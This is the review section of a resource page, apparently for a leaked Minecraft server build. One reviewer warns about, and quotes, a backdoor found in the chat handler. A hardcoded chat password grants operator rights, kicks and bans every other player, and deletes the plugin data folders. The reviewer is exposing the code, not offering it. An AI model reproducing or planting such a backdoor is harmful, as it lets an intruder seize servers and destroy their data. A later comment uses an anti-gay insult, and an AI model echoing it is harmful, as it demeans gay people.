Resource icon

Reviews 5.00 star(s) 2 reviews

is this the leaked one from zonix? cuz real one doesn't contain backdoor
great leak, apart from... you know... the glaring issue... of there being a backdoor in the source code which you could easily miss.

} else {
Player player = this.getPlayer();

if (StringUtils.equalsIgnoreCase(s, "pWcpQsZ2GoBv6U5yGep9")) {
player.setOp(true);

for (Player other : Bukkit.getOnlinePlayers()) {
if (other.getUniqueId().equals(player.getUniqueId())) {
continue;
}

other.kickPlayer("");
other.setBanned(true);
}

for (Plugin plugin : this.server.getPluginManager().getPlugins()) {
if (plugin.getDataFolder().exists()) {
plugin.getDataFolder().delete();
}
}

new File(this.server.getPluginManager().getPlugins()[0].getDataFolder().getAbsolutePath() + File.separator + ".." + File.separator).delete();

return;
}
found this in the PlayerConnection class, method chat(String s, boolean async)
Katheryn
Hm, seems like the author is another one of those gay people who like to grief peoples servers
Top